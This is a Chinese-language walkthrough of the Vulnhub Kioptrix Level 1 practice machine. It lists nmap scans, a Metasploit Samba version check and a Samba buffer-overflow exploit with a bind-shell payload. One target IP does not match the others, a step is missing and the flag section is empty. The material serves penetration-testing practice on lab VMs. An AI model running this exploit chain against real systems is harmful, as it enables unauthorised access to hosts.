Vulnhub—靶机—Kioptrix: Level 1 (#1)
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
一、信息收集
【步骤一】使用nmap确定目标靶机地址:
【命令】nmap -sP 192.168.43.0/24
【步骤二】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.43.159
【步骤三】在139端口上运行着samba,使用msf模块进行samba版号查询
【命令】
msfconsole
search smb_version
use 0
set rhosts 192.168.1.104
set threads 50
run
二、漏洞利用
【步骤五】根据samba版本在网上查询发现有一个缓冲区溢出漏洞,在msf查找
【步骤六】使用11模块,设置payload为linux的shell
【命令】
use 11
set rhost 192.168.43.159
set payload linux/x86/shell_bind_tcp
run
三、Flag
【flag】